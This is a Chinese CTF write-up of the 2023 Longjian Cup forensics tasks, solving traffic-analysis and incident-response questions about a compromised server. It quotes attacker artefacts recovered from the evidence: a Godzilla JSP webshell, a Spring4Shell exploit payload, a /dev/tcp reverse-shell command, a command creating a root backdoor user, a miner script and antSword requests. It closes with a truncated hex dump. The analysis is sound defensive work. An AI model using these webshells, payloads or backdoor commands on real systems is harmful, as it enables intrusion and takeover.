前言

DIDCTF中的2023陇剑杯的题目。

一、数据分析-HW

1、hard_web_1

服务器开放了哪些端口，请按照端口大小顺序提交答案，并以英文逗号隔开(如服务器开放了80 81 82 83端口，则答案为80,81,82,83)

TCP扫描确认端口开放的标志就是返回SYN+ACK的包，所以只需要过滤SYN、ACK状态都为1的包即可

tcp.flags.syn==1 and tcp.flags.ack==1

服务器IP应该指的就是192.168.162.180，开放的端口为：80,888,8888

2、hard_web_2

服务器中根目录下的flag值是多少？

tcp流的20049是第一次访问shell.jsp这个木马，攻击者执行命令肯定是从这里开始，所以从这里开始分析：

拿到请求和响应了，但是是加密的流量，那么接下来想办法解密。

往前翻发现在24207号流量包中，看到了:

攻击者通过test.jsp执行了命令：cat /www/wwwroot/test.com/shell.jsp，服务器返回了这个文件的内容，我们先不分析这个test.jsp，先把shell.jsp的内容提取出来：

<%!String xc = "748007e861908c03";classXextendsClassLoader{publicX(ClassLoader z){super(z);    }public Class Q(byte[] cb){returnsuper.defineClass(cb, 0, cb.length);    }}publicbyte[] x(byte[] s, boolean m) {try {            javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES");            c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES"));return c.doFinal(s);        } catch (Exception e) {returnnull;        }    }%><%try {byte[] data = newbyte[Integer.parseInt(request.getHeader("Content-Length"))];        java.io.InputStream inputStream = request.getInputStream();int _num = 0;while ((_num += inputStream.read(data, _num, data.length)) < data.length);        data = x(data, false);if (session.getAttribute("payload") == null) {            session.setAttribute("payload", new X(this.getClass().getClassLoader()).Q(data));        } else {            request.setAttribute("parameters", data);            Object f = ((Class) session.getAttribute("payload")).newInstance();            java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();            f.equals(arrOut);            f.equals(pageContext);            f.toString();            response.getOutputStream().write(x(arrOut.toByteArray(), true));        }    } catch (Exception e) {}     %>

这个一看是哥斯拉的木马，那就用哥斯拉的解密方式对流量进行解密即可……

访问shell.jsp的流量总共也没几条，一条一条分析发现在tcp流的20053解密后，攻击者的请求及服务器的响应是：

cat /flagflag{9236b29d-5488-41e6-a04b-53b0d8276542}

3、hard_web_3

该webshell的连接密码是多少？

连接密码就是上面分析出来的哥斯拉的AES加密的密钥：748007e861908c03

但是这个是md5之后的值，它的连接密码是这个对应的明文：

上特殊手段：14mk3y

二、数据分析-SS

1、sevrer save_1

黑客是使用什么漏洞来拿下root权限的。格式为：CVE-2020-114514

在TCP流的105中看到了攻击者通过shell.jsp执行了id命令，服务器返回了root

说明这时候已经提权成功了，那么我们看它的前几个流量包，前几个流量包攻击者提交的请求分别是：

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{prefix}i java.io.InputStream in = %{c}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } %{suffix}i&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=prefix: <%suffix: %>//c: Runtimeclass.module.classLoader.resources.context.parent.pipeline.first.pattern=

拿着这个东西直接网上一搜就出来了：

答案就是：CVE-2022-22965

2、sevrer save_2

黑客反弹shell的ip和端口是什么，格式为：10.0.0.1:4444

追踪tcp流的106：

反弹shell的命令：/bin/sh -i >& /dev/tcp/192.168.43.128/2333 0>&1

答案就是：192.168.43.128:2333

3、sevrer save_3

黑客的病毒名称是什么？ 格式为：filename

这个个人感觉比较靠谱的方法是，分析/etc/passwd文件，发现有新增用户guests和ll，并且权限竟然还是root权限，这肯定是不对的……

接下来看看这两个用户的目录中的文件：

只看到了guests用户目录，ll用户目录可能已经删了。

然后把这里面的文件一个个都扔到沙箱中分析：

把这个目录里的文件都扔沙箱了，分析出来都是恶意文件，但是提交的时候答案是：main

4、sevrer save_4

黑客的病毒运行后创建了什么用户？请将回答用户名与密码：username:password

上个题中查看的/etc/passwd也就多了那两个用户：guest和ll

或者也可以把文件扔沙箱去分析，看到有一条命令：useradd -p openssl passwd -1 -salt 'salt' 123456 ll -o -u 0 -g root -G root

生成了用户ll，密码是123456，加密还加了盐，盐值就是salt。

答案：ll:123456

5、sevrer save_5

服务器在被入侵时外网ip是多少? 格式为：10.10.0.1

这个就是一通翻找：

# /home/guests/.log.txt2023/07/2211:29:06 Status: success2023/07/2211:29:06 Country: Japan2023/07/2211:29:06 CountryCode: JP2023/07/2211:29:06 Timezone: Asia/Tokyo2023/07/2211:29:06 Query: 172.105.202.2392023/07/2211:29:06exec: "setenforce": executable file not found in $PATH2023/07/2211:29:06exec: "ulimit": executable file not found in $PATH2023/07/2211:29:06exec: "ufw": executable file not found in $PATH2023/07/2211:29:06exec: "iptables": executable file not found in $PATH2023/07/2211:29:06 exit status 12023/07/2211:29:06 fork/exec sh .idea/mine_doge.sh: no such file or directory

里面出现了一个IP地址：172.105.202.239

6、sevrer save_6

病毒运行后释放了什么文件？格式：文件1,文件2

微步沙箱真的好用啊，答案：lolMiner,mine_doge.sh

7、sevrer save_7

矿池地址是什么？ 格式：domain:1234

这个就找这几个文件内容就行：

# homeguests.ideamine_doge.sh#!/bin/bash################################### Begin of user-editable part ###################################POOL=doge.millpools.cc:5567WALLET=DOGE:DRXz1q6ys8Ao2KnPbtb7jQhPjDSqtwmNN9.lolMinerWorker###################################  End of user-editable part  ###################################cd"$(dirname "$0")"./lolMiner --algo ETHASH --pool $POOL --user $WALLET$@ --4g-alloc-size 4024 --keepfree 8while [ $? -eq 42 ]; do    sleep 10s    ./lolMiner --algo ETHASH --pool $POOL --user $WALLET$@ --4g-alloc-size 4024 --keepfree 8done

矿池POOL：doge.millpools.cc:5567

8、sevrer save_8

黑客的钱包地址是多少？格式：xx:xxxxxxxx

还是第7题的mine_doge.sh文件：WALLET=DOGE:DRXz1q6ys8Ao2KnPbtb7jQhPjDSqtwmNN9.lolMinerWorker

答案：DRXz1q6ys8Ao2KnPbtb7jQhPjDSqtwmNN9.lolMinerWorker

三、数据分析-WS

1、Wireshark1_1

被入侵主机的IP是？

统计所有的IP，出现了这三个：

前两个应该一个是攻击者，一个是服务器，分析一下：

红色是请求，蓝色是响应，随便点一个请求包中的数据，发送登录信息的是192.168.246.1，那么服务器就是192.168.246.28

2、Wireshark1_2

被入侵主机的口令是？

tcp流的0号：

用户名密码是：ctf/youcannevergetthis，并且显示登录成功。

题目问的是口令，所以答案是：youcannevergetthis

3、Wireshark1_3

用户目录下第二个文件夹的名称是？

还是tcp流的0号：

第二个是：Downloads

4、Wireshark1_4

/etc/passwd中倒数第二个用户的用户名是？

相比于其他比赛的流量分析，这个比赛的简直是送分呀……

还是tcp流的0号：

往下翻看到/etc/passwd文件的全部内容：

倒数第二个用户的用户名：mysql

四、数据分析-IR

1、IncidentResponse_1

你是公司的一名安全运营工程师，今日接到外部监管部门通报，你公司网络出口存在请求挖矿域名的行为。需要立即整改。经过与网络组配合，你们定位到了请求挖矿域名的内网IP是10.221.36.21。查询CMDB后得知该IP运行了公司的工时系统。（虚拟机账号密码为：root/IncidentResponsePasswd） 挖矿程序所在路径是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n 'strings'|md5sum|cut -d ' ' -f1获取md5值作为答案）

查看/root/.viminfo，看到有大量的对redis的操作：

查看一下redis配置文件：/etc/redis/redis.conf

明显不对了，应该是用redis进行的挖矿，挖矿程序：/etc/redis/redis-server

md5一下：6f72038a870f05cbf923633066e48881

2、IncidentResponse_2

挖矿程序连接的矿池域名是？

这个在上个题目的redis.conf文件里就有：donate.v2.xmrig.com:3333

md5一下：3fca20bb92d0ed67714e68704a0a4503

3、IncidentResponse_3

攻击者入侵服务器的利用的方法是？

在/home/app/目录中有个renren-admin.jar，同目录下还有个nohup.log文件，查看一下这个文件，看看运行日志：

里面看到了shiro，这个还真坑啊，一定要是这样：shirodeserialization

md5一下：3ee726cb32f87a15d22fe55fa04c4dcd

4、IncidentResponse_4

攻击者的IP是？

查看nginx日志：/var/log/nginx/access.log

这个IP：81.70.166.3，明显是攻击请求。

md5一下：c76b4b1a5e8c9e7751af4684c6a8b2c9

5、IncidentResponse_5

攻击者发起攻击时使用的User-Agent是？

还是上个题的/var/log/nginx/access.log，找到81.70.166.3的请求记录即可：Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36

去掉空格，全部转小写，得到其md5提交竟然不对，再找找这个IP的其他UA：

又找到一个：Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

然后去掉空格，全部转小写，获取其md5：6ba8458f11f4044cce7a621c085bb3c6

6、IncidentResponse_6

攻击者使用了两种权限维持手段，相应的配置文件路径是？

ssh公钥是一个：

然后也没找到第二种啊……

看了writeup就是这个：/root/.ssh/authorized_keys

md5一下：a1fa1b5aeb1f97340032971c342c4258

7、IncidentResponse_7

攻击者使用了两种权限维持手段，相应的配置文件路径是？

好嘛，原来是两个题……

第一题就分析了，redis服务是有问题的，查看redis服务，发现一直重复启动

（有点牵强，不过题目就是这么设定的）

这个文件在/lib/systemd/system/redis.service

/lib/systemd/system/redis.serviceb2c5af8ce08753894540331e5a947d35

五、数据分析-SSW

1、SmallSword_1

连接蚁剑的正确密码是______?（答案示例：123asd）

tcp流的127：

POST /sqlii/Less-7/info1.php HTTP/1.1Host: 192.168.77.155Accept-Encoding: gzip, deflateUser-Agent: antSword/v1.3Content-Type: application/x-www-form-urlencodedContent-Length: 744Connection: close6ea280898e404bfabd0ebb702327b19f=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Becho%20%22-%3E%7C%22%3B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22A%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3Becho%20%22%7C%3C-%22%3Bdie()%3BHTTP/1.1 200 OKDate: Thu, 03 Aug 2023 04:32:23 GMTServer: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45X-Powered-By: PHP/5.4.45Content-Length: 134Connection: closeContent-Type: text/html->|D:/phpStudy/PHPTutorial/WWW/sqlii/Less-7 C:D:F: Windows NT CAT 5.1 build 2600 (Windows XP Professional Service Pack 3) i586 cats|<-

连接密码：6ea280898e404bfabd0ebb702327b19f

2、SmallSword_2

题目内容：攻击者留存的值是______?(答案示例：d1c3f0d3-68bb-4d85-a337-fb97cf99ee2e)

tcp流的142号：

POST /sqlii/Less-7/info1.php HTTP/1.1Host: 192.168.77.155Accept-Encoding: gzip, deflateUser-Agent: antSword/v1.3Content-Type: application/x-www-form-urlencodedContent-Length: 478Connection: close0x72b3f341e432=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3NxbGlpL0xlc3MtNy9oYWNrZXIudHh0&0xe9bb136e8a5e9=YWQ2MjY5YjctM2NlMi00YWU4LWI5N2YtZjI1OTUxNWU3YTkxIA%3D%3D&6ea280898e404bfabd0ebb702327b19f=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Becho%20%22-%3E%7C%22%3Becho%20%40fwrite(fopen(base64_decode(%24_POST%5B%220x72b3f341e432%22%5D)%2C%22w%22)%2Cbase64_decode(%24_POST%5B%220xe9bb136e8a5e9%22%5D))%3F%221%22%3A%220%22%3B%3Becho%20%22%7C%3C-%22%3Bdie()%3BHTTP/1.1 200 OKDate: Thu, 03 Aug 2023 04:38:38 GMTServer: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45X-Powered-By: PHP/5.4.45Content-Length: 7Connection: closeContent-Type: text/html->|1|<-

把攻击者的数据base64解码：

YWQ2MjY5YjctM2NlMi00YWU4LWI5N2YtZjI1OTUxNWU3YTkxIA%3D%3D->ad6269b7-3ce2-4ae8-b97f-f259515e7a91

3、SmallSword_3

题目内容：攻击者下载到的flag是______?(答案示例：flag3{uuid})

这个题实在没找到，看了writeup……

tcp流的130，有一个：

将请求base64解码：

请求了huorong.exe，然后把页面返回的数据导出来导成exe：

导出后运行会得到一个png图片，但是我这里运行没有反应，索性我就给它反编译得到了它的源代码：

# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information# Version : Python 3.9import osdefhex_to_bytes(hex_string):    hex_string = hex_string.replace('0x', '').replace('0X', '')return bytes.fromhex(hex_string)defsave_bytes_as_image(byte_data, output_path):with open(output_path, 'wb') as f:        f.write(byte_data)None(None, None, None)# WARNING: Decompyle incompletedefmain():    hex_data = '89504e470d0a1a0a0000000d494844520000025d0000010108020000005adb9644000000017352474200aece1ce90000000467414d410000b18f0bfc61050000000970485973000012740000127401de661f780000207849444154785eedddeb61a33aa305d0afae2928f54c35d34c8a391730f6162081f023374ed6fa3507849ea0edd84ecefffe0300aee42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b908002117bb7dfefdf3bf953f7f3fe7936fe96d4754e9f8c7bff9dc296fbda69ffffe7efc997dfc7b8f5ebf639ff97de46237b9f86dc8c5fffefbf73177f8e6be29f84aefd8677e23b9d84d2e7e1b72b1d2f16fdff577ec33bf935cecf6b67b68d34f4a855f968bdb9fbc46dffba7af77ec33bf935cec2617bf0db958e9f8b7effa3bf699df492e767bdb3db4e927a5c22fcbc5f1a7af55d7dfa0e3efd8677e23b9d84d2e7e1b7271327eb973fa76e7c7c7df77f96ee73bf6995f472e76938bdf865c045e472e76938bdf865c045e472e76ebdd433f1fdc573f07f33f1f7550d557a4c21346b3ade1eb73f1694bf29ddcbd368fafe9dddeb1cfbc1db9d86d770f9dfe8ec77c74d6fb073d3effcd1fb9ccd7c550c3df7fe71ee7f9ef89cc15942e95cdc52e7a5361ecdf563b412f9d986bbca974a0ad56c534a153055f938b9f9fff6a7da80e62fad86cad3d4383a1f2b5339fb7551adc6deee2d4edb1545d91db355ddd79c73ef32bc9c56ecd3db47222ea3f7e4c3e8787762eb56fa78ee8aa6d991e7db978ead7ce8e7b31ec4bfba319d3682e5b33f6f0f5b9b83f8eca18aa37c14ea71e1dc2d9ebefb83d6e9eb522efd8677e25b9d8adf2180d4f57e5e8da65a7dda8e74dcbc10672bc7f4c96b5d447349fbca8d75c1f51772f865c698da6ab8e8fbfdb52f7ed68f519e8ea44d74c9d19e7b9119ca9a06b3ca35a0d5d17f7adc83bf6995f492e76ab3c6cf5b777b6aa8fdbb95c6c3fb3fb2f8c979675d446b4d8edebfb4bbd232787538dd6b35352b86f477b604d0787b3d9ecd6b66cfda5465ba5b5d6ba748fa752c35357e41dfbccaf2417bb55f7bd9b613bddd9516bcf5bf9f8fe195ebcfefb377ea760327e2c329f299c8f924ba78a6e2dfb511951d9467dc0d5ada35a74fa24a73d9ecd70da43590fa3e2be1d6d7f4daf0dcfffb1b51a426500f5b8db365b2fb7a3d2f3a39b6ce332bae6edb17bf5eaca8a6d77deb1cffc4a72b15b6b0f5d7ebde6b3fe5c561eb8b160be04b051a968bb79363681da377ea6705a76a332a234511d6eef363f0ef8b0afcbcaead3bb1ac93088fa22dcb9a3b5d6743383ad82cb662bcb519bb16d65f579dd53e9d0760a9e7e7b0c1e589177ec33bf925cec567fe42a4f52edc9ae6c7cc38f519b630bdb06578db57ab45f6d54aebff6b35a7563d7a894ad96dc942b27a5ba1df6553369f4ed40bdae13edaed6b55266bbf2db4295bbe348a5a575afeb83ebbe3d9ebf22efd8677e25b9d8adf624d537b45ac97b9eb8cd53be6caebf430d950a2ed757378dd608b6855b9dd8194f6d436b4ed9a9c2bb4e0db4daee6aaccd298d6d917bfa5e6968554d6d6cad95a978c18abc639ff995e462b7da33db788e2a8fdcf113377e0e37987ea7aaf139c8628b78700f19546a182b3857f1b674b3ecb6e875566a4deeccd85df35bf378bbebe2951a97f3d19e84532aed2ceba90dedc4edf1f8cc6c4bbf639ff995e462b7ca53d77a664f3c71d36724dbc7b96ed15ea591137bc8a83aa2da672f7bdb452d2bba5d2b3e3996c30db6d789351d756dbcdbb1ec2fdbd37abeace8c1dbe3152bf28e7de657928bdd2a8f51eba9ab3ca09527aeebd7961716edf535b2a732a29afd5a2bdde877adfae4589eb6a39daca83661dbf2dbc114ebb63e7966df2f1df6fcc1dbe3152bf28e7de657928bdd2a8fd103b958a96da9f6566ad95ead82938f756d44b59f5df7f6eec371ec9a3b7c762c95f2f7ed68272beaece7b6d8add0faceb837160f7bded9d596b3971f7567f28e7de657928bdd2a8fd1ddb95829f0bff17736a6dff79bcb544a2ddaeb08df03f511d5fab65373b578af6bb527c7f2b41ded644595e2d5f2db7273a9f538ef8ec5e39e3f787bbc6245deb1cffc4a72b15be531ba3717b7e7ab0fe4a6d8512e9edc665b23aad4dcde32b685efd8ec4f8ea552fcbe1dedc49a8efabbb92939f56f7df48e99baba2763ce3477f2f24af1ed8abc639ff995e462b7e7e5e2e674bd9e6d838b7295fe9c7cb0db23aa0ca0bf97cd6969ab8da53d945aefeedbd15ed7eea6ec50707decbe3e5f547abeacae36b4132dd62e6faf6bdfccbc639ff995e462b7ca53d77ae82a8f5cf9c46d4e57eb396cafba8bb4f781adbd166abbc69dfdec516bae514b75d877ee6867a6b05ab6ddec7a447ffeaeff4ef5439b70a537abface8cade2052bf28e7de657928bdd2a4f52eb89ad3c9fe513b73dddb5876cdaab3fdb43a9fa9f07f9fcf7f177d1cefe88ba778e5ac183bd6cfc4dcd6581da9636b6b6aaa6f167f6eeddd15a33b8a9adffcffbddaceb5e7fa5e9be1e5f557abeaeb035b8cedba373455acd54c6f78e7de657928bdd2acfd2d37271da8aaf754dff3fdcf9f0d2a6bdfa3e30bafc25f2d9ed572497cffdd188eabb47d77e37bafcddf0b9cc68facb05f32fa7740f65fa9fcf2e475173df8ed6da1f0799c066bb47e1dfae7cf0e0165ca97c5be363b7c7d357e41dfbccaf2417bb559eea3b7371e7d9df5769ef5c55cbe7fe7844f5ad7ddb8d7ab93dcfa8a374df8ef6509bc74deeecf18d3ba75ba5e7b5fe3c727b3c7d45deb1cffc4a72b15be5896bed6e95277bf9c4f53cbdc3abe375a16a7bcdb7162b0e7bb169a1ded34a47ceed66f5a174d65199993b77b4da0cecfc3851682dfd526b407d57efa9f4bc3e05f7df1e839efb74d4b722efd8677e25b9d8adb68736b6b7ca63bd7ee20e9edeb1e66d91e676dabd172c7ad137a246dd952da4b717a3c6508eab18df6fae94ba6f47abcfc061279aebb051afaafffaa653537038a059ad86e36bbb57e41dfbccaf2417bb551ea3d6fed6918b83d6c788d78f1ab70deeeea7d35f5a9d0b56fdf9585dde3ba2c63653dd440e7b31f5e3f6596a4df3efe3dd3e837dda8ed69c81f647bcd73e74aacddd3376dfd35370fef6889dd998afe9eace3bf6995f492efebf1bbf9b39fd4f34c62f069cda73eb8aff2dc7f58b0a8b6fbf7c8db917976eccdf7928ff96cfb1695ec6eba7417cfd0846599ba10f77cde2b7db7c1fb83d562b525ef5da61be639f796772115ea7ef9d83f7f78e19231769918bf032bf2516e5223f8a5c8417a96cbc4ff8c6cdb72417f949e4223cc5ead3d3eaef1afcd87d572ef293c845788a4b0e8effdbccd6af40fed41f160772919f442ec253d47e3e2cfde83d572ef293c845788add5cfcc13f2a4ee4223f895c84a768e6e2ce2f9fff1872919f442ec25354b6d93fe35fc7f9f19938928bfc24721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120be3a173f3ffffdfd98fdfd37fdf7d5e75ce4a7590ff909ca59ab4cdb4e8b2fe80c6fe5e0dee9f49c5a78533f7e1bf9ca5cfcfcfbe77fa53f7f3ffffbf731ffc7f45f2f37aee76d41c7253d7ca8a70d6053aabc2ff66aa90d39cacefc1d6a990f1fcbacfdef637557eeb4b8df992f90bd74a33683bd933c3839939fff3efe4c3e1e9f82e906b938a8abbfe4aec5588f6fe0b59d7be784ce5a8e86fce058eeb2b8adc6669babd15fb2eb8eea1eec306945bb7bcdbec6feaab5b6915cb4711b6b5173db54782af9353744cdd7e562f124cdc609fdc25c5cafe7d59f8ffa7d57942f1ffdf109980f976a0f447dc8937a2d43572ea70f3477a59d16774e7d91d6028c56033f31c9276772dcea52fef12928a6f5a0b2fe924d9f65df6fced5d6bc774ee9ab656fc8cf18cb59fd6d9ee85dcf1dd55b5dbddca0b549bdc2ee8d5a9c9ccd65ba9eeeedd55b97fa52b23ea32ff655b958ceda9ff1c5d2e44b877f625b1e2c5630a7771776594b6bc8839d5abaa6a1b8be6c73a7c59d535f666fee1653776292bb67727aedbfb9011ebde916f7d46e65fd255b1635ac9ca8b071ef9cd453cbce909f3496539a6d6e1aec2bd97d47f50f76f7c67f64b94ed859b5e5c9fe3d2d3ddf1fe0c5a5cdc5abddaf1979e9ab72b1f51ce578e5867aae614d879f37c6b51cffe373f9d26c3df3b77e2dbab5bc2d2e276ac726ad2197278633536f96872ec57634aa6eb6b87beacba40f7fe6b788a298b81393bc9cb6bd992c2b282c16ecb455a53b95f5976c2a0636fff030eccbd559d9f79c3be1b896bd213f6b2c2794f7c5651b180e8e9bfabff5fbee9d25bbefa81383bd141d1b9d2367f95ec82be665e5e0462dc6d2de61769eee61d3adfb736bb668329df9f23deb17e5e256d1a955ebb715591eaff7b6b897cac3c7432e8fb74a57350aefd471aafa17b9f561bf07e9ead124d707553d5a5e3e3c85f33f57cb7b4e51e545b3b2fe924d8d7bac31597bea9376d6512d7b437ede58ba15dd3da8bbbb64398a9d3bead460871f4097193d283af4c88275d95bb549d199755f6ea7eee864d1eee2eadbf1fda57881d7e7e2e593d662c2879fbf2fc6a1566f8f8be1c2e9d5c5f469f6de27d5e30bb9a9d8b5d0f03aebaa75cda475cf166796c71bbdcde1cbaaee0eb9756bb58e0f8a018e23ac94dd69717ffe2fbaa77a283a74662e39152d5f42efcb6cafc7b7d439c9e76672687ce8efa5b3ed653f2177c8eda56ea3b2be92074bd098949d132d9bd99916f4d26c73e18fefc085fd213f6f2c37b7fed56fdffe8afb4b76de510f0fb6a8bb3ad5c7cfe3c1e4dcecaedad136926e563ab9af18e1fadaeb241d2dc6d3bd3c17cb655d9ac65abf3b727465333f95eaff0c77c1fccffd452aae5dd77b3bb53a918e1515af0fee0eb938b9ec5ba33795cac6db7bfee75cc94e8bc30331ff73edd24aff540fad54ebda9be2523a797045d7242f06bdacb031933747e73bdcaa1876875b6dfb8db54bf62c41caac5a292eee5b88c505c5545c6dbeb1542db3be034b47437ede5846adaf681555d71afcacc6437fc985628a56437a7cb045b955c18ee7b16372aef657ad7213cce62229d0bf7417cd191a5ccfd53afc52df3d17c757398b0aca62edba6f568b7479d53318b233d76eb682f226592e48d1e4f431c0f062ed76e05acbee908bdb7cd56ae54cef00775aeccfc5dda9de696233790dc5f8a6a646f34f1f2b3d935c9daf59fbcca4ac7eb5bc7d6e158c97a7b64a655d257b96a09cbcf2e2622c9d0b51d4d452b450d6dfb06af678c8cf1bcb7a34cbd9bbd6b1ecc4324d86fbabda83a3924b45cf17231a3c38d8b2d8a2dce2c4424af54cceec56dd65e0d792b72eb79b9b8b94e3bcaa3fdd4b45c59569b8d6ba9ed597fb82cf17e70f902f031c0caf522fc693395e0e7d789533969aff6b505c9f72459dc35d7b5981cff247fdc172aeb7ab7b7d2764e556b0b256b5d760ab87661a5e75c8450fd66bbd28bf3e7234c0a9f66a8bfbf37fc7544f5db99c98dec4e9fdbdde451d0b95bbfe78924fcde4c2ce953d6eb55fea4e6d9bca3a4b762d41397bb783c54806b5b16e95158d55556fab6b558b56874e8ec7761fb1ae21bf622c73e7069b36536ad8abe77f95d2b5fe924b45df37451e19ece221286b2e2b6d3d8f7d9333b915dd59b569cb58d6797139bde8d1c266464ab9ac5aec7a7ab78e57789befdd6c0a96b7d6f2daa2add52db7bc1d2f869735b7bbe6ea56c3b653b50d7bb2a9a63ae4a207ebbad7e5cf0fb0dae2c5cea98d94bd365b5cbd9d915e65af37969dea99e41333b9b273e5a15c7bad39479695f597acd82e41d9eb86c3859d94cbb0bc62b3ca6593cb2ed72be91ef293c65299a5d1aad17563d3c76ccbb751e6cbfb4bae14176e0bdc39d83283068b7a372b55d137398b2307ab36281a5e757ad9db95d66aeecedbe856a039cc17f9c6b938bcf6b97ea23c17b9980bb69768e7d4fc3eea54ef5c6252345e5c3cecc2f3c1abc5c9e983e7bf4307e723cda115c777ee8475f9f6285aa7ce5f31eb9feacd2a4551ea66d156f923d1d466b906ad15684ef289995cd97d1a7747713b595c97dacacafa4bce0e9660b4da2927e5fbe4d76eee0e616f72d6a74e142d0ff50cf91963c9b9f936b9cafa8e458be55e76a3a8fb72b8bfe44a7161ed7cef606fd6af0b57951e7567d439392957d4d4be518b96d79dee7dba0b3bb5dd9433d12c